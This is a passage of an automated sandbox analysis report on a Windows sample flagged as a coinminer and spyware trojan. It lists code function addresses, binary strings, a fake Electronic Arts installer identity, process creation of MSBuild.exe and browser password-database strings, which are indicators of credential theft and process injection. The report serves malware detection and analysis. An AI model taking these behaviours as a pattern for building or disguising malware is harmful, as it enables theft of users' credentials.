                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB129901_2_6CB12990
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB0B9701_2_6CB0B970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACD9601_2_6CACD960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADA9401_2_6CADA940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB22AB01_2_6CB22AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAE4AA01_2_6CAE4AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACCAB01_2_6CACCAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2BA901_2_6CB2BA90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD1AF01_2_6CAD1AF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF8AC01_2_6CAF8AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF9A601_2_6CAF9A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB134A01_2_6CB134A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1C4A01_2_6CB1C4A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABD4E01_2_6CABD4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC64C01_2_6CAC64C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADD4D01_2_6CADD4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2542B1_2_6CB2542B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC54401_2_6CAC5440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2545C1_2_6CB2545C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB185F01_2_6CB185F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAE05121_2_6CAE0512
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1E6801_2_6CB1E680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB276E31_2_6CB276E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB056001_2_6CB05600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABC6701_2_6CABC670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD46401_2_6CAD4640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB077A01_2_6CB077A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF77101_2_6CAF7710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAE60A01_2_6CAE60A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADC0E01_2_6CADC0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB250C71_2_6CB250C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFF0701_2_6CAFF070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF51901_2_6CAF5190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2B1701_2_6CB2B170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB22A01_2_6CAB22A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFE2F01_2_6CAFE2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABF3801_2_6CABF380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB253C81_2_6CB253C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFD3201_2_6CAFD320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACC3701_2_6CACC370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB53401_2_6CAB5340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBECD01_2_6CBBECD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB5ECC01_2_6CB5ECC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC26C001_2_6CC26C00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6AC601_2_6CB6AC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3AC301_2_6CC3AC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB64DB01_2_6CB64DB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCECDC01_2_6CCECDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF6D901_2_6CBF6D90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8AD501_2_6CC8AD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2ED701_2_6CC2ED70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCE8D201_2_6CCE8D20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC00EC01_2_6CC00EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE6E901_2_6CBE6E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6AEC01_2_6CB6AEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFEE701_2_6CBFEE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC40E201_2_6CC40E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6EFB01_2_6CB6EFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3EFF01_2_6CC3EFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB60FE01_2_6CB60FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA8FB01_2_6CCA8FB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB66F101_2_6CB66F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC22F701_2_6CC22F70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA0F201_2_6CCA0F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBCEF401_2_6CBCEF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC668E01_2_6CC668E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA28801_2_6CBA2880
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC348401_2_6CC34840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBEA8201_2_6CBEA820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF09A01_2_6CBF09A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC7C9E01_2_6CC7C9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB949F01_2_6CB949F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1A9A01_2_6CC1A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC209B01_2_6CC209B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBB69001_2_6CBB6900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB989601_2_6CB98960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDEA801_2_6CBDEA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC0EA001_2_6CC0EA00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDCA701_2_6CBDCA70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC18A301_2_6CC18A30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC66BE01_2_6CC66BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC00BA01_2_6CC00BA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A4801_2_6CC8A480
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA64D01_2_6CBA64D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFA4D01_2_6CBFA4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBEA4301_2_6CBEA430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC44201_2_6CBC4420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB784601_2_6CB78460
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB545B01_2_6CB545B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2A5E01_2_6CC2A5E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBEE5F01_2_6CBEE5F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC645401_2_6CC64540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA85501_2_6CCA8550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC005701_2_6CC00570
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC25601_2_6CBC2560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBB85401_2_6CBB8540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBE6E01_2_6CBBE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFE6E01_2_6CBFE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB846D01_2_6CB846D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBC6501_2_6CBBC650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB8A7D01_2_6CB8A7D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CCED930 appears 33 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CCEDAE0 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CCE09D0 appears 164 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CB83620 appears 43 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAF94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CB89B10 appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00402360 appears 286 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAECBE8 appears 134 times
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: invalid certificate
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000000.1639536772.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hLegalCopyrightCopyright (c) Electronic Arts. All rights reserved.P&OriginalFilenameEAappInstaller.exe0 vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.0000000003515000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.0000000003515000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFzglflz.dll" vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFzglflz.dll" vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFzglflz.dll" vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeBinary or memory string: hLegalCopyrightCopyright (c) Electronic Arts. All rights reserved.P&OriginalFilenameEAappInstaller.exe0 vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/26@1/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6CB17030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,1_2_00410AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,1_2_00411020
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMutant created: NULL
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: BGHJJDGHCBGDHIECBGID.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeReversingLabs: Detection: 23%
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeVirustotal: Detection: 26%
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
